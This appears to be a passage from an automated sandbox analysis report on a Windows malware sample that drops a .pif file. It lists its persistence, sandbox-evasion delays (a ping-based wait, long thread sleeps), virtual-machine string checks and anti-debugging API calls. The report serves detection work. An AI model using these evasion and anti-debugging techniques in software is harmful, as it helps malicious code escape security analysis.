          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0041C50E push cs; iretd 7_2_0041C4E2
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004231C8 push eax; ret 7_2_00423179
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040E21D push ecx; ret 7_2_0040E230
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0041C6BE push ebx; ret 7_2_0041C6BF
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeFile created: C:\Users\user\Links\dajivhqI.pifJump to dropped file
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeFile created: C:\Users\user\Links\dajivhqI.pifJump to dropped file
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D64E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029D64E4
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 29DC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 2A320000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 2A020000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599671Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599561Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599452Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599343Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599015Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598796Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598576Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598468Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598249Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598140Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597921Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597812Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597593Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597483Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597265Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597046Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596937Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596828Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596718Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596499Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596390Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596248Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596137Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596028Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595885Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595765Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595656Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595546Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595437Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595328Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595218Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595109Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595000Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594890Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594671Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594562Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifWindow / User API: threadDelayed 1551Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifWindow / User API: threadDelayed 8302Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -30437127721620741s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 4232Thread sleep count: 1551 > 30Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 4232Thread sleep count: 8302 > 30Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599671s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599561s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599452s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599125s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -599015s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598796s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598576s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598468s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598249s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598140s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597921s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597593s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597483s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597375s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597265s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -597046s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596937s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596828s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596718s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596499s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596390s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596248s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596137s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -596028s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595885s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595765s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595656s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595546s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595437s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595328s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595218s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595109s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -595000s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -594890s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -594781s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -594671s >= -30000sJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pif TID: 2732Thread sleep time: -594562s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C52F8
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599671Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599561Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599452Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599343Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599015Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598796Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598576Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598468Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598249Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598140Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597921Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597812Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597593Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597483Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597265Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597046Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596937Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596828Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596718Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596499Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596390Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596248Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596137Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596028Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595885Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595765Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595656Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595546Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595437Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595328Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595218Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595109Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595000Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594890Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594671Jump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594562Jump to behavior
          Source: y79a2l1FY5.exe, 00000000.00000002.882851060.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
          Source: dajivhqI.pif, 00000007.00000002.3369058977.0000000028266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeAPI call chain: ExitProcess graph end nodegraph_0-25709
          Source: C:\Users\user\Links\dajivhqI.pifAPI call chain: ExitProcess graph end nodegraph_7-53715
          Source: C:\Users\user\Links\dajivhqI.pifProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029DA5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_029DA5B0
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_2A1CB270 LdrInitializeThunk,LdrInitializeThunk,7_2_2A1CB270
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_029D3E20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,7_2_0040ADB0
          Source: C:\Users\user\Links\dajivhqI.pifProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
